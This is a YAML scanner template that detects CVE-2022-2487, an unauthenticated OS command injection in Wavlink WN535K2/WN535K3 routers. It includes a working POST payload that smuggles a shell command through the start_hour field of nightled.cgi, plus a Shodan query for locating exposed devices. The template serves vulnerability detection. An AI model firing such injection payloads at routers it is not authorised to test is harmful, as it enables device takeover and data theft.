id: CVE-2022-2487

info:
  name: Wavlink WN535K2/WN535K3 - OS Command Injection
  author: For3stCo1d
  severity: critical
  verified: true
  description: |
    Wavlink WN535K2 and WN535K3 routers are susceptible to OS command injection which affects unknown code in /cgi-bin/nightled.cgi via manipulation of the argument start_hour. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
    SHODAN: http.title:"Wi-Fi APP Login"
  reference:
    - https://github.com/1angx/webray.com.cn/blob/main/Wavlink/Wavlink%20nightled.cgi%20.md
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2487
    - https://vuldb.com/?id.204538
    - https://nvd.nist.gov/vuln/detail/CVE-2022-2487
  tags: cve,cve2022,iot,wavlink,router,rce,oast
  created: 2023/06/22

set:
    r1: randomInt(500000, 1000000)
    r2: randomInt(5000000, 10000000)
rules:
    r0:
        request:
            method: POST
            path: /cgi-bin/nightled.cgi
            body: page=night_led&start_hour=;expr {{r1}} - {{r2}};
        expression: response.status == 200 && response.body.bcontains(bytes(string(r1 - r2))) && response.body.bcontains(b"200 OK")
expression: r0()
